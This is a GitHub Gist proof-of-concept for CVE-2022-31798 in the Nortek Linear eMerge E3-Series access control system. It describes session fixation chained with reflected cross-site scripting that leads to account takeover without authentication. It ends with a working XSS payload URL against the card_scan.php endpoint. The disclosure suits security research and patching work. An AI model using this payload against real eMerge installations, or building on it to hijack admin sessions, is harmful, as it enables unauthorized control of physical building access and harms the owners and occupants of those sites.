Created
August 7, 2022 19:36
-
-
Save omarhashem123/bccdcec70ab7e8f00519d56ea2e3fd79 to your computer and use it in GitHub Desktop.
CVE-2022-31798 PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Nortek Linear eMerge E3-Series - account takeover | |
| # Exploit Author: Omar Hashim | |
| # Version: 0.32-07p | |
| # Vendor home page: https://www.nortekcontrol.com/access-control/ | |
| # Vendor home page: https://linear-solutions.com/ | |
| # Authentication Required: No | |
| # CVE: CVE-2022-31798 | |
| # Description | |
| ==================== | |
| There is local session fixation that chained with reflected cross-site scripting leads to account take over of admin or less privileged users | |
| # Proof Of Concept: | |
| ==================== | |
| http://<HOST:PORT>/card_scan.php?No=1337&ReaderNo=1337&CardFormatNo=<img src=x onerror=alert(document.location)> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment